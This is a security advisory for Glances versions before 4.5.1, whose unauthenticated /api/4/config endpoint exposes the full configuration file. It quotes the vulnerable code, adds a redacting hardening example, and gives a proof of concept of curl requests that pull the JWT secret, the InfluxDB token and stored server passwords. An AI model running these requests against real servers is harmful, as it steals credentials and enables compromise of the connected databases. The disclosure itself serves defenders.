GHSA-gh4x-f7cq-wwx6

Published: 09 Mar 2026
Source: github
GitHub: reviewed
CVSS4: 8.7

Description

Glances Exposes Unauthenticated Configuration Secrets

Summary

The /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords.

Details

Root Cause: The as_dict() method in config.py iterates over every section and every key in the ConfigParser and returns them all as a flat dictionary. No sensitive key filtering or redaction is applied.

Affected Code:

  • File: glances/outputs/glances_restful_api.py, lines 1154-1167

```python
def _api_config(self):
    """Glances API RESTful implementation.

    Return the JSON representation of the Glances configuration file
    HTTP/200 if OK
    HTTP/404 if others error
    """
    try:
        # Get the RAW value of the config' dict
        args_json = self.config.as_dict()  # <-- Returns ALL config including secrets
    except Exception as e:
        raise HTTPException(status.HTTP_404_NOT_FOUND, f"Cannot get config ({str(e)})")
    else:
        return GlancesJSONResponse(args_json)
```

  • File: glances/config.py, lines 280-287

```python
def as_dict(self):
    """Return the configuration as a dict"""
    dictionary = {}
    for section in self.parser.sections():
        dictionary[section] = {}
        for option in self.parser.options(section):
            dictionary[section][option] = self.parser.get(section, option)  # No filtering
    return dictionary
```

  • File: glances/outputs/glances_restful_api.py, lines 472-475 (authentication bypass)

```python
if self.args.password:
    router = APIRouter(prefix=self.url_prefix, dependencies=[Depends(self.authentication)])
else:
    router = APIRouter(prefix=self.url_prefix)  # No authentication!
```
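Added hardening example (not Glances' own code, and not the project's 4.5.1 fix): a redacting replacement for the unfiltered as_dict() above, which masks values stored under secret-like option names and the whole [passwords] section before the dictionary reaches the API layer. The key-name patterns, section list and the sample glances.conf are assumptions made for this example.

```python
import configparser
import json
import re

# Option names treated as sensitive. This pattern is an assumption of this
# example, not a list taken from Glances; extend it to match your glances.conf.
SENSITIVE_KEY_RE = re.compile(
    r"(password|passwd|secret|token|api_key|apikey|key_password)", re.IGNORECASE
)
SENSITIVE_SECTIONS = {"passwords"}  # every option in these sections is masked
REDACTED = "********"


def config_as_dict(parser, redact=True):
    """Flatten a ConfigParser into {section: {option: value}}.

    redact=False reproduces the unfiltered dump of the vulnerable as_dict();
    redact=True replaces sensitive values so the API can never leak them.
    """
    result = {}
    for section in parser.sections():
        result[section] = {}
        for option in parser.options(section):
            value = parser.get(section, option)
            if redact and (section.lower() in SENSITIVE_SECTIONS or SENSITIVE_KEY_RE.search(option)):
                value = REDACTED
            result[section][option] = value
    return result


# Constructed sample config modelled on the sections named in the advisory.
# The values are placeholders, not real credentials.
SAMPLE_CONF = """
[outputs]
jwt_secret_key = example-jwt-secret
refresh = 2

[influxdb2]
host = localhost
token = example-influx-token

[passwords]
myserver = example-server-password
"""


def load_sample():
    parser = configparser.ConfigParser()
    parser.read_string(SAMPLE_CONF)
    return parser


if __name__ == "__main__":
    print(json.dumps(config_as_dict(load_sample()), indent=2))
```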

PoC

Step 1: Start Glances in default webserver mode:

```
glances -w
# Glances web server started on http://0.0.0.0:61208/
```

Step 2: From any network-reachable host, retrieve all configuration secrets:

```
# Get entire config including all credentials
curl http://target:61208/api/4/config
```

Step 3: Extract specific secrets:

```
# Get JWT secret key for token forgery
curl http://target:61208/api/4/config/outputs/jwt_secret_key
# Get InfluxDB token
curl http://target:61208/api/4/config/influxdb2/token
# Get all stored server passwords
curl http://target:61208/api/4/config/passwords
```

Impact

Full Infrastructure Compromise: Database credentials (InfluxDB, MongoDB, PostgreSQL/TimescaleDB, CouchDB, Cassandra) allow direct access to all connected backend data stores.

Packages

Name: Glances
Ecosystem: pip
Affected versions: < 4.5.1
Fixed version: 4.5.1

EPSS

Percentile: 87%
Score: 0.03371
Low

CVSS4: 8.7 High

Weaknesses

CWE-200

Related vulnerabilities

CVSS3: 7.5
ubuntu
19 days ago

Glances is an open-source system cross-platform monitoring tool. Prior to 4.5.1, the /api/4/config REST API endpoint returns the entire parsed Glances configuration file (glances.conf) via self.config.as_dict() with no filtering of sensitive values. The configuration file contains credentials for all configured backend services including database passwords, API tokens, JWT signing keys, and SSL key passwords. This vulnerability is fixed in 4.5.1.

CVSS3: 7.5
nvd
19 days ago


CVSS3: 7.5
debian
19 days ago

Glances is an open-source system cross-platform monitoring tool. Prior ...
